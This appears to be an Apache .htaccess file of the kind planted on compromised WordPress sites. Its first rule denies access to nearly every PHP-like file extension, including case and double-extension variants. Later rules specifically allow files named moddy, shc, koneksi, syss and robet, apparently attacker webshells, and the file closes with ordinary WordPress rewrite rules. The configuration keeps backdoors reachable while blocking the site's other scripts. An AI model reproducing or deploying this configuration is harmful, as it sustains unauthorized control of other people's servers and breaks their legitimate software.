<FilesMatch ".*\.(py|ini|awd|conf|exe|phtml|ht|htacces|gif|php.gif|php|shtml|phar|inc|pjpeg|php.|pht|phtm|fla|php.fla|php.FLA|PHP.FLA|php<?.jpg|php.sql|php.txt|txt.php|phps|PhaR|pHTM|xhtml|php%00|PHPs|pHAr|pHps|pHTml|phTMl|phtML|phTML|phpS||PHP|Php|PHp|pHp|pHP|PhP|phP|pHTML|Phtml|pHtMl|PhTmL|pHtml||PHtml|PHTml|PHTMl|phtmL|PHTML|phTml|PHAR|Phar|PHar|PHAr|pHAR|phAr|phaR|PHaR|phAR|Inc|INC|inC|INc|iNC|iNc|Shtml|sHTML|sHtMl|ShTmL|PHP.|PHAR.|jpg;php|php;jpg|php;.jpg|jpg;.php|php<?.html|php;png|php.XXXTXT|php1|php2|php3|php4|php5|php6|php7|php8|php9|php10|php56|php74|pHar|php.inc|php.jpg|php.pjpeg|PhtmL|phtML|phTML|shtmL|shtML|shTML|json|JSON|pHp5|pHp1|pHp2|pHp3|pHp4|pHp6|pHp7|pHp8|pHp9|pHp10|pHp56|pHp74|PHP1|PHP2|PHP3|PHP4|PHP5|PHP6|PHP7|PHP8|PHP9|PHP10|PHP56|PHP74|Php1|Php2|Php3|Php4|Php5|Php6|Php7|Php8|Php9|Php10|Php56|Php74|phP1|phP2|phP3|phP4|phP5|phP6|phP7|phP8|phP9|phP10|phP56|phP74|PHp1|PHp2|PHp3|PHp4|PHp5|PHp6|PHp7|PHp8|PHp9|PHp10|PHp56|PHp74|pHP1|pHP2|pHP3|pHP4|pHP5|pHP6|pHP7|pHP8|pHP9|pHP10|pHP11|pHP56|pHP74|PhP1|PhP2|PhP3|PhP4|PhP5|PhP6|PhP7|PhP8|PhP9|PhP10|PhP56|PhP74|suspected)$">
Order Allow,Deny
Deny from all
</FilesMatch>
<FilesMatch "^(moddy.php.gif|moddy.php|moddy.shtml|moddy.phar|moddy.inc|moddy.pjpeg|moddy.php.|moddy.pht|moddy.phtm|moddy.fla|moddy.php.fla|moddy.php.FLA|moddy.PHP.FLA|moddy.php<?.jpg|moddy.php.sql|moddy.php.txt|moddy.txt.php|moddy.phps|moddy.PhaR|moddy.pHTM|moddy.xhtml|moddy.php%00|moddy.PHPs|moddy.pHAr|moddy.pHps|moddy.pHTml|moddy.phTMl|moddy.phtML|moddy.phTML|moddy.phpS|moddy.PHP|moddy.Php|moddy.PHp|moddy.pHp|moddy.pHP|moddy.PhP|moddy.phP|moddy.pHTML|moddy.Phtml|moddy.pHtMl|moddy.PhTmL|moddy.pHtml|moddy.PHtml|moddy.PHTml|moddy.PHTMl|moddy.phtmL|moddy.PHTML|moddy.phTml|moddy.PHAR|moddy.Phar|moddy.PHar|moddy.PHAr|moddy.pHAR|moddy.phAr|moddy.phaR|moddy.PHaR|moddy.phAR|moddy.Inc|moddy.INC|moddy.inC|moddy.INc|moddy.iNC|moddy.iNc|moddy.Shtml|moddy.sHTML|moddy.sHtMl|moddy.ShTmL|moddy.PHP.|moddy.PHAR.|moddy.jpg;php|moddy.php;jpg|moddy.php;.jpg|moddy.jpg;.php|moddy.php<?.html|moddy.php;png|moddy.php.XXXTXT|moddy.php1|moddy.php2|moddy.php3|moddy.php4|moddy.php5|moddy.php6|moddy.php7|moddy.php8|moddy.php9|moddy.php10|moddy.php56|moddy.php74|moddy.pHar|moddy.php.inc|moddy.php.jpg|moddy.php.pjpeg|moddy.PhtmL|moddy.phtML|moddy.phTML|moddy.shtmL|moddy.shtML|moddy.shTML|moddy.json|moddy.JSON|moddy.pHp5|moddy.pHp1|moddy.pHp2|moddy.pHp3|moddy.pHp4|moddy.pHp6|moddy.pHp7|moddy.pHp8|moddy.pHp9|moddy.pHp10|moddy.pHp56|moddy.pHp74|moddy.PHP1|moddy.PHP2|moddy.PHP3|moddy.PHP4|moddy.PHP5|moddy.PHP6|moddy.PHP7|moddy.PHP8|moddy.PHP9|moddy.PHP10|moddy.PHP56|moddy.PHP74|moddy.Php1|moddy.Php2|moddy.Php3|moddy.Php4|moddy.Php5|moddy.Php6|moddy.Php7|moddy.Php8|moddy.Php9|moddy.Php10|moddy.Php56|moddy.Php74|moddy.phP1|moddy.phP2|moddy.phP3|moddy.phP4|moddy.phP5|moddy.phP6|moddy.phP7|moddy.phP8|moddy.phP9|moddy.phP10|moddy.phP56|moddy.phP74|moddy.PHp1|moddy.PHp2|moddy.PHp3|moddy.PHp4|moddy.PHp5|moddy.PHp6|moddy.PHp7|moddy.PHp8|moddy.PHp9|moddy.PHp10|moddy.PHp56|moddy.PHp74|moddy.pHP1|moddy.pHP2|moddy.pHP3|moddy.pHP4|moddy.pHP5|moddy.pHP6|moddy.pHP7|moddy.pHP8|moddy.pHP9|moddy.pHP10|moddy.pHP11|moddy.pHP56|moddy.pHP74|moddy.PhP1|moddy.PhP2|moddy.PhP3|moddy.PhP4|moddy.PhP5|moddy.PhP6|moddy.PhP7|moddy.PhP8|moddy.PhP9|moddy.PhP10|moddy.PhP56|moddy.PhP74)$">
Order Allow,Deny
Allow from all
</FilesMatch>
<FilesMatch "^(shc.php.gif|shc.php|shc.shtml|shc.phar|shc.inc|shc.pjpeg|shc.php.|shc.pht|shc.phtm|shc.fla|shc.php.fla|shc.php.FLA|shc.PHP.FLA|shc.php<?.jpg|shc.php.sql|shc.php.txt|shc.txt.php|shc.phps|shc.PhaR|shc.pHTM|shc.xhtml|shc.php%00|shc.PHPs|shc.pHAr|shc.pHps|shc.pHTml|shc.phTMl|shc.phtML|shc.phTML|shc.phpS|shc.PHP|shc.Php|shc.PHp|shc.pHp|shc.pHP|shc.PhP|shc.phP|shc.pHTML|shc.Phtml|shc.pHtMl|shc.PhTmL|shc.pHtml|shc.PHtml|shc.PHTml|shc.PHTMl|shc.phtmL|shc.PHTML|shc.phTml|shc.PHAR|shc.Phar|shc.PHar|shc.PHAr|shc.pHAR|shc.phAr|shc.phaR|shc.PHaR|shc.phAR|shc.Inc|shc.INC|shc.inC|shc.INc|shc.iNC|shc.iNc|shc.Shtml|shc.sHTML|shc.sHtMl|shc.ShTmL|shc.PHP.|shc.PHAR.|shc.jpg;php|shc.php;jpg|shc.php;.jpg|shc.jpg;.php|shc.php<?.html|shc.php;png|shc.php.XXXTXT|shc.php1|shc.php2|shc.php3|shc.php4|shc.php5|shc.php6|shc.php7|shc.php8|shc.php9|shc.php10|shc.php56|shc.php74|shc.pHar|shc.php.inc|shc.php.jpg|shc.php.pjpeg|shc.PhtmL|shc.phtML|shc.phTML|shc.shtmL|shc.shtML|shc.shTML|shc.json|shc.JSON|shc.pHp5|shc.pHp1|shc.pHp2|shc.pHp3|shc.pHp4|shc.pHp6|shc.pHp7|shc.pHp8|shc.pHp9|shc.pHp10|shc.pHp56|shc.pHp74|shc.PHP1|shc.PHP2|shc.PHP3|shc.PHP4|shc.PHP5|shc.PHP6|shc.PHP7|shc.PHP8|shc.PHP9|shc.PHP10|shc.PHP56|shc.PHP74|shc.Php1|shc.Php2|shc.Php3|shc.Php4|shc.Php5|shc.Php6|shc.Php7|shc.Php8|shc.Php9|shc.Php10|shc.Php56|shc.Php74|shc.phP1|shc.phP2|shc.phP3|shc.phP4|shc.phP5|shc.phP6|shc.phP7|shc.phP8|shc.phP9|shc.phP10|shc.phP56|shc.phP74|shc.PHp1|shc.PHp2|shc.PHp3|shc.PHp4|shc.PHp5|shc.PHp6|shc.PHp7|shc.PHp8|shc.PHp9|shc.PHp10|shc.PHp56|shc.PHp74|shc.pHP1|shc.pHP2|shc.pHP3|shc.pHP4|shc.pHP5|shc.pHP6|shc.pHP7|shc.pHP8|shc.pHP9|shc.pHP10|shc.pHP11|shc.pHP56|shc.pHP74|shc.PhP1|shc.PhP2|shc.PhP3|shc.PhP4|shc.PhP5|shc.PhP6|shc.PhP7|shc.PhP8|shc.PhP9|shc.PhP10|shc.PhP56|shc.PhP74)$">
Order Allow,Deny
Allow from all
</FilesMatch>
<FilesMatch "^(koneksi.php.gif|koneksi.php|koneksi.shtml|koneksi.phar|koneksi.inc|koneksi.pjpeg|koneksi.php.|koneksi.pht|koneksi.phtm|koneksi.fla|koneksi.php.fla|koneksi.php.FLA|koneksi.PHP.FLA|koneksi.php<?.jpg|koneksi.php.sql|koneksi.php.txt|koneksi.txt.php|koneksi.phps|koneksi.PhaR|koneksi.pHTM|koneksi.xhtml|koneksi.php%00|koneksi.PHPs|koneksi.pHAr|koneksi.pHps|koneksi.pHTml|koneksi.phTMl|koneksi.phtML|koneksi.phTML|koneksi.phpS|koneksi.PHP|koneksi.Php|koneksi.PHp|koneksi.pHp|koneksi.pHP|koneksi.PhP|koneksi.phP|koneksi.pHTML|koneksi.Phtml|koneksi.pHtMl|koneksi.PhTmL|koneksi.pHtml|koneksi.PHtml|koneksi.PHTml|koneksi.PHTMl|koneksi.phtmL|koneksi.PHTML|koneksi.phTml|koneksi.PHAR|koneksi.Phar|koneksi.PHar|koneksi.PHAr|koneksi.pHAR|koneksi.phAr|koneksi.phaR|koneksi.PHaR|koneksi.phAR|koneksi.Inc|koneksi.INC|koneksi.inC|koneksi.INc|koneksi.iNC|koneksi.iNc|koneksi.Shtml|koneksi.sHTML|koneksi.sHtMl|koneksi.ShTmL|koneksi.PHP.|koneksi.PHAR.|koneksi.jpg;php|koneksi.php;jpg|koneksi.php;.jpg|koneksi.jpg;.php|koneksi.php<?.html|koneksi.php;png|koneksi.php.XXXTXT|koneksi.php1|koneksi.php2|koneksi.php3|koneksi.php4|koneksi.php5|koneksi.php6|koneksi.php7|koneksi.php8|koneksi.php9|koneksi.php10|koneksi.php56|koneksi.php74|koneksi.pHar|koneksi.php.inc|koneksi.php.jpg|koneksi.php.pjpeg|koneksi.PhtmL|koneksi.phtML|koneksi.phTML|koneksi.shtmL|koneksi.shtML|koneksi.shTML|koneksi.json|koneksi.JSON|koneksi.pHp5|koneksi.pHp1|koneksi.pHp2|koneksi.pHp3|koneksi.pHp4|koneksi.pHp6|koneksi.pHp7|koneksi.pHp8|koneksi.pHp9|koneksi.pHp10|koneksi.pHp56|koneksi.pHp74|koneksi.PHP1|koneksi.PHP2|koneksi.PHP3|koneksi.PHP4|koneksi.PHP5|koneksi.PHP6|koneksi.PHP7|koneksi.PHP8|koneksi.PHP9|koneksi.PHP10|koneksi.PHP56|koneksi.PHP74|koneksi.Php1|koneksi.Php2|koneksi.Php3|koneksi.Php4|koneksi.Php5|koneksi.Php6|koneksi.Php7|koneksi.Php8|koneksi.Php9|koneksi.Php10|koneksi.Php56|koneksi.Php74|koneksi.phP1|koneksi.phP2|koneksi.phP3|koneksi.phP4|koneksi.phP5|koneksi.phP6|koneksi.phP7|koneksi.phP8|koneksi.phP9|koneksi.phP10|koneksi.phP56|koneksi.phP74|koneksi.PHp1|koneksi.PHp2|koneksi.PHp3|koneksi.PHp4|koneksi.PHp5|koneksi.PHp6|koneksi.PHp7|koneksi.PHp8|koneksi.PHp9|koneksi.PHp10|koneksi.PHp56|koneksi.PHp74|koneksi.pHP1|koneksi.pHP2|koneksi.pHP3|koneksi.pHP4|koneksi.pHP5|koneksi.pHP6|koneksi.pHP7|koneksi.pHP8|koneksi.pHP9|koneksi.pHP10|koneksi.pHP11|koneksi.pHP56|koneksi.pHP74|koneksi.PhP1|koneksi.PhP2|koneksi.PhP3|koneksi.PhP4|koneksi.PhP5|koneksi.PhP6|koneksi.PhP7|koneksi.PhP8|koneksi.PhP9|koneksi.PhP10|koneksi.PhP56|koneksi.PhP74)$">
Order Allow,Deny
Allow from all
</FilesMatch>
<FilesMatch "^(syss.php.gif|syss.php|syss.shtml|syss.phar|syss.inc|syss.pjpeg|syss.php.|syss.pht|syss.phtm|syss.fla|syss.php.fla|syss.php.FLA|syss.PHP.FLA|syss.php<?.jpg|syss.php.sql|syss.php.txt|syss.txt.php|syss.phps|syss.PhaR|syss.pHTM|syss.xhtml|syss.php%00|syss.PHPs|syss.pHAr|syss.pHps|syss.pHTml|syss.phTMl|syss.phtML|syss.phTML|syss.phpS|syss.PHP|syss.Php|syss.PHp|syss.pHp|syss.pHP|syss.PhP|syss.phP|syss.pHTML|syss.Phtml|syss.pHtMl|syss.PhTmL|syss.pHtml|syss.PHtml|syss.PHTml|syss.PHTMl|syss.phtmL|syss.PHTML|syss.phTml|syss.PHAR|syss.Phar|syss.PHar|syss.PHAr|syss.pHAR|syss.phAr|syss.phaR|syss.PHaR|syss.phAR|syss.Inc|syss.INC|syss.inC|syss.INc|syss.iNC|syss.iNc|syss.Shtml|syss.sHTML|syss.sHtMl|syss.ShTmL|syss.PHP.|syss.PHAR.|syss.jpg;php|syss.php;jpg|syss.php;.jpg|syss.jpg;.php|syss.php<?.html|syss.php;png|syss.php.XXXTXT|syss.php1|syss.php2|syss.php3|syss.php4|syss.php5|syss.php6|syss.php7|syss.php8|syss.php9|syss.php10|syss.php56|syss.php74|syss.pHar|syss.php.inc|syss.php.jpg|syss.php.pjpeg|syss.PhtmL|syss.phtML|syss.phTML|syss.shtmL|syss.shtML|syss.shTML|syss.json|syss.JSON|syss.pHp5|syss.pHp1|syss.pHp2|syss.pHp3|syss.pHp4|syss.pHp6|syss.pHp7|syss.pHp8|syss.pHp9|syss.pHp10|syss.pHp56|syss.pHp74|syss.PHP1|syss.PHP2|syss.PHP3|syss.PHP4|syss.PHP5|syss.PHP6|syss.PHP7|syss.PHP8|syss.PHP9|syss.PHP10|syss.PHP56|syss.PHP74|syss.Php1|syss.Php2|syss.Php3|syss.Php4|syss.Php5|syss.Php6|syss.Php7|syss.Php8|syss.Php9|syss.Php10|syss.Php56|syss.Php74|syss.phP1|syss.phP2|syss.phP3|syss.phP4|syss.phP5|syss.phP6|syss.phP7|syss.phP8|syss.phP9|syss.phP10|syss.phP56|syss.phP74|syss.PHp1|syss.PHp2|syss.PHp3|syss.PHp4|syss.PHp5|syss.PHp6|syss.PHp7|syss.PHp8|syss.PHp9|syss.PHp10|syss.PHp56|syss.PHp74|syss.pHP1|syss.pHP2|syss.pHP3|syss.pHP4|syss.pHP5|syss.pHP6|syss.pHP7|syss.pHP8|syss.pHP9|syss.pHP10|syss.pHP11|syss.pHP56|syss.pHP74|syss.PhP1|syss.PhP2|syss.PhP3|syss.PhP4|syss.PhP5|syss.PhP6|syss.PhP7|syss.PhP8|syss.PhP9|syss.PhP10|syss.PhP56|syss.PhP74)$">
Order Allow,Deny
Allow from all
</FilesMatch>
<FilesMatch "^(robet.php.gif|robet.php|robet.shtml|robet.phar|robet.inc|robet.pjpeg|robet.php.|robet.pht|robet.phtm|robet.fla|robet.php.fla|robet.php.FLA|robet.PHP.FLA|robet.php<?.jpg|robet.php.sql|robet.php.txt|robet.txt.php|robet.phps|robet.PhaR|robet.pHTM|robet.xhtml|robet.php%00|robet.PHPs|robet.pHAr|robet.pHps|robet.pHTml|robet.phTMl|robet.phtML|robet.phTML|robet.phpS|robet.PHP|robet.Php|robet.PHp|robet.pHp|robet.pHP|robet.PhP|robet.phP|robet.pHTML|robet.Phtml|robet.pHtMl|robet.PhTmL|robet.pHtml|robet.PHtml|robet.PHTml|robet.PHTMl|robet.phtmL|robet.PHTML|robet.phTml|robet.PHAR|robet.Phar|robet.PHar|robet.PHAr|robet.pHAR|robet.phAr|robet.phaR|robet.PHaR|robet.phAR|robet.Inc|robet.INC|robet.inC|robet.INc|robet.iNC|robet.iNc|robet.Shtml|robet.sHTML|robet.sHtMl|robet.ShTmL|robet.PHP.|robet.PHAR.|robet.jpg;php|robet.php;jpg|robet.php;.jpg|robet.jpg;.php|robet.php<?.html|robet.php;png|robet.php.XXXTXT|robet.php1|robet.php2|robet.php3|robet.php4|robet.php5|robet.php6|robet.php7|robet.php8|robet.php9|robet.php10|robet.php56|robet.php74|robet.pHar|robet.php.inc|robet.php.jpg|robet.php.pjpeg|robet.PhtmL|robet.phtML|robet.phTML|robet.shtmL|robet.shtML|robet.shTML|robet.json|robet.JSON|robet.pHp5|robet.pHp1|robet.pHp2|robet.pHp3|robet.pHp4|robet.pHp6|robet.pHp7|robet.pHp8|robet.pHp9|robet.pHp10|robet.pHp56|robet.pHp74|robet.PHP1|robet.PHP2|robet.PHP3|robet.PHP4|robet.PHP5|robet.PHP6|robet.PHP7|robet.PHP8|robet.PHP9|robet.PHP10|robet.PHP56|robet.PHP74|robet.Php1|robet.Php2|robet.Php3|robet.Php4|robet.Php5|robet.Php6|robet.Php7|robet.Php8|robet.Php9|robet.Php10|robet.Php56|robet.Php74|robet.phP1|robet.phP2|robet.phP3|robet.phP4|robet.phP5|robet.phP6|robet.phP7|robet.phP8|robet.phP9|robet.phP10|robet.phP56|robet.phP74|robet.PHp1|robet.PHp2|robet.PHp3|robet.PHp4|robet.PHp5|robet.PHp6|robet.PHp7|robet.PHp8|robet.PHp9|robet.PHp10|robet.PHp56|robet.PHp74|robet.pHP1|robet.pHP2|robet.pHP3|robet.pHP4|robet.pHP5|robet.pHP6|robet.pHP7|robet.pHP8|robet.pHP9|robet.pHP10|robet.pHP11|robet.pHP56|robet.pHP74|robet.PhP1|robet.PhP2|robet.PhP3|robet.PhP4|robet.PhP5|robet.PhP6|robet.PhP7|robet.PhP8|robet.PhP9|robet.PhP10|robet.PhP56|robet.PhP74)$">
Order Allow,Deny
Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
